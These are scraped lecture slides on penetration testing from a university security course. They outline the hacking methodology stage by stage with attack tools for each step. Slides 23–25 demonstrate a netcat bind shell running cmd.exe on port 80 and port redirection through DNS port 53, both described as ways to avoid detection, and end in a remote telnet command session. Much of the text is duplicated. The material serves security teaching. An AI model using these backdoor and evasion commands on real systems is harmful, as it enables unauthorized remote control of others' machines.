1 cs691 chow c. edward chow penetrate testing. 2 cs691 chow outline of the talk definition, concepts...
Post on 21-Dec-2015
217 views
TRANSCRIPT
1cs691 chow
C. Edward ChowC. Edward Chow
Penetrate Testing Penetrate Testing
2cs691 chow
Outline of The TalkOutline of The Talk
Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack Framework for penetration studies Skills and Requirements of a Penetration Tester SAN list of Security Holes Internet Penetration Dial up Penetration Internal Penetration References:
Chapter 23 Vulnerability Analysis, by Matt Bishop. Hack I.T, Security Through Penetration Testing, by T.J.
Klevinksy, Scott Laliberte, Ajay Gupta. Hacking Exposed, by Stuart McClure, Joel Scambray and
George Kurtzhttp://www.hackingexposed.com/win2k/links.html
3cs691 chow
DefinitionDefinition
Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.
Using the failure of the system to violate the site security policy is called exploiting the vulnerability
Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.
It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence.
Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects.
What is the difference between penetration testing and hacking/intrusion?
Vulnerability (Security Flaw): specific failure of the system to guard against unauthorized access or actions. It can be procedures, technology (SW or HW), or management.
Using the failure of the system to violate the site security policy is called exploiting the vulnerability
Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.
It is not a proof techniques. It can never prove the absence of security flaws. It can only prove their presence.
Example goals of penetration studies are gaining of read or write access to specific objects, files, or accounts; gaining of specific privileges; and disruption or denial of the availability of objects.
What is the difference between penetration testing and hacking/intrusion?
4cs691 chow
More Thorough Penetration StudyMore Thorough Penetration Study
A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implemenation.
A simple list of vulnerabilities , although helpful in closing those specific holes, contribute far less to the security of a system.
In practice, constrains (resource, money, time) affect the penetration study
A more thorough penetration study is to find the proper interpretation of vulnerabilities found, draw conclusion on the care taken in the design and implemenation.
A simple list of vulnerabilities , although helpful in closing those specific holes, contribute far less to the security of a system.
In practice, constrains (resource, money, time) affect the penetration study
5cs691 chow
Hacking Methodology
(Steps)
Hacking Methodology
(Steps) An excellent
description inside of the back cover page of “Hacking Exposed” text by McClure et al.
An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al.
Scanning
Footprinting
Enumeration
Gaining Access
Escalating Privilege
Pilferting
Covering Tracks
Creating Back Doors
Denial of Service
whois, nslookup
Nmap, fping
dumpACL, showmountlegion, rpcinfo
Tcpdump, LophtcrackNAT
Johntheripper, getadmin
Rhosts, userdataConfig files, registry
zap, rootkits
Cron,at, startup foldernetcat, keystroke logger
remote desktop
Synk4, ping of deathtfn/stacheldraht
6cs691 chow
FootprintingFootprinting Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range
Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others
instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of).
Defense: deploy NIDS (snort), RotoRouter
Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range
Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others
instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of).
Defense: deploy NIDS (snort), RotoRouter
Techniques Open Source search
Find domain name, admin, IP addresses name servers
DNS zone transfer
Tools Google, search engine, Edgar
Whois
(Network solution; arin)
Nslookup (ls –d)digSam Spade
7cs691 chow
ScanningScanning Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet
sending and randomize the ports or IP addresses to be scanned in the sequence.
Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example.
Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet
sending and randomize the ports or IP addresses to be scanned in the sequence.
Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example.
Techniques Ping sweep TCP/UDP port scan
OS detection
Tools Fping, icmpenumWS_Ping ProPack
nmap
NmapSuperscan
fscan
Nmapqueso
siphon
8cs691 chow
EnumerationEnumeration
Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step.
Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step.
Techniques list user accounts
list file shares identify applications
Tools Null sessions
DumpACL
Sid2usreonSiteAdmin
Showmount
NAT
legion
Banner grabing with telnet or netcat, rpcinfo
9cs691 chow
Gaining AccessGaining Access
Based on the information gathered so far, make an informed attempted to access the target.
Based on the information gathered so far, make an informed attempted to access the target.
Techniques
Password eavesdropping
File share brute forcing
Password
File grab
Bufferoverflow
Tools Tcpdump/ssldumpL0phtcrackreadsmb
NATlegion
Tftp
Pwddump2(NT)
Ttdb, bindIIS .HTR/ISM.DLL
10cs691 chow
Escalating PrivilegeEscalating Privilege
If only user-level access was obtained in the last step, seek to gain complete control of the system.
If only user-level access was obtained in the last step, seek to gain complete control of the system.
Techniques Password cracking Known Exploits
Tools John the ripperL0phtcrack
Lc_messages,
Getadmin,sechole
11cs691 chow
PilferingPilfering
Webster's Revised Unabridged Dictionary (1913) Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF.
pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.
Gather info on identify mechanisms to allow access of trusted systems.
Techniques Evaluate Trusts Search for cleartext passwords
Tools rhostsLSA secrets
User data, Configuration filesRegistry
12cs691 chow
Covering TracksCovering Tracks
Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.
Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp.
Techniques Clear Logs Hide tools
Tools Zap, Event Log GUI Rootkitsfile streaming
13cs691 chow
Creating Back DoorsCreating Back Doors
Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.
Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides.
Techniques Create rogue user accounts
Schedule batch jobs
Infect startup files
Tools Members of wheel, admin
Cron, AT rc, startup folder, registry keys
Techniques Plant remote control services
Install monitoring mechanisms
Replace appls with Trojans
Tools Netcat, remote.exe
VNC, B02Kremote desktop
Keystroke loggers, add acct. to secadmin mail aliases
Login, fpnwcint.dll
14cs691 chow
Denial of ServicesDenial of Services
If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.
If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.
Techniques Syn flood ICMP techniques Identical src/dst SYN requests
Tools synk4 Ping to deathsmurf
Land
Latierra
Techniques Overlapping fragment/offset bugs
Out of bounds TCP options (OOB)
DDoS
Tools Netcat, remote.exe
VNC, B02Kremote desktop
Keystroke loggers, add acct. to secadmin mail aliases
Trinoo
TFNstacheldraht
15cs691 chow
Nessus: Integrated Security Scanning Tool
Nessus: Integrated Security Scanning Tool
Originally designed by Renaud Deraison Available at www.nessus.org Main scanning engine running on Unix server with client
GUI running on Unix or Windows. Pretty good control and reporting. Include a script language for plug-in (detecting
additional attacks). http://www.nessus.org/pres/bh2001/index.html
16cs691 chow
17cs691 chow
18cs691 chow
19cs691 chow
20cs691 chow
21cs691 chow
22cs691 chow
Setting up Backdoor ConnectionSetting up Backdoor Connection
Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)
Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall.
We will use netcat and fpipe to illustrate the concept. Netcat is available at
http://www.atstake.com/research/tools/network_utilities/ Fpipe is available at http://www.foundstone.com
Once obtain the admin privilege, you install tools that allow you to run command remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting the msg (fpipe)
Port redirection accepts packet from one port and send it over another port. It can be used to avoid packet filter firewall.
We will use netcat and fpipe to illustrate the concept. Netcat is available at
http://www.atstake.com/research/tools/network_utilities/ Fpipe is available at http://www.foundstone.com
23cs691 chow
Setup NetcatSetup Netcat
C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
listening on [128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on
[128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu Here we bind in front of port 80. You can also use port 139. The
idea is used known port to avoid detection. -L is used to repeat previous command after connection is
terminated. The nc command will receive command from packet to port 80, and
run it with cmd.exe and send back execution result.
C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
listening on [128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on
[128.198.177.63] 80 ... connect to [128.198.177.63] from VIVIAN.eas.uccs.edu Here we bind in front of port 80. You can also use port 139. The
idea is used known port to avoid detection. -L is used to repeat previous command after connection is
terminated. The nc command will receive command from packet to port 80, and
run it with cmd.exe and send back execution result.
24cs691 chow
Setup FPIPESetup FPIPE
C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com
Pipe connected: In: 128.198.162.60:58797 --> 128.198.177.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.177.63:53 Out: 128.198.177.63:53 --> 128.198.177.63:80
Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection.
C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com
Pipe connected: In: 128.198.162.60:58797 --> 128.198.177.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.177.63:53 Out: 128.198.177.63:53 --> 128.198.177.63:80
Here the fpipe program listens to packet incoming from blanca to port 53, relay it over to 128.198.177.63 using port 53 (DNS) to avoid detection.
25cs691 chow
Telnet to the relay hostTelnet to the relay host C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00
Directory of C:\work\cucs\cs522\project
04/29/2003 12:56 PM <DIR> . 04/29/2003 12:56 PM <DIR> .. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps 04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf
C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00
Directory of C:\work\cucs\cs522\project
04/29/2003 12:56 PM <DIR> . 04/29/2003 12:56 PM <DIR> .. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps 04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf
26cs691 chow
Layering of TestsLayering of Tests
1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.
1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.
27cs691 chow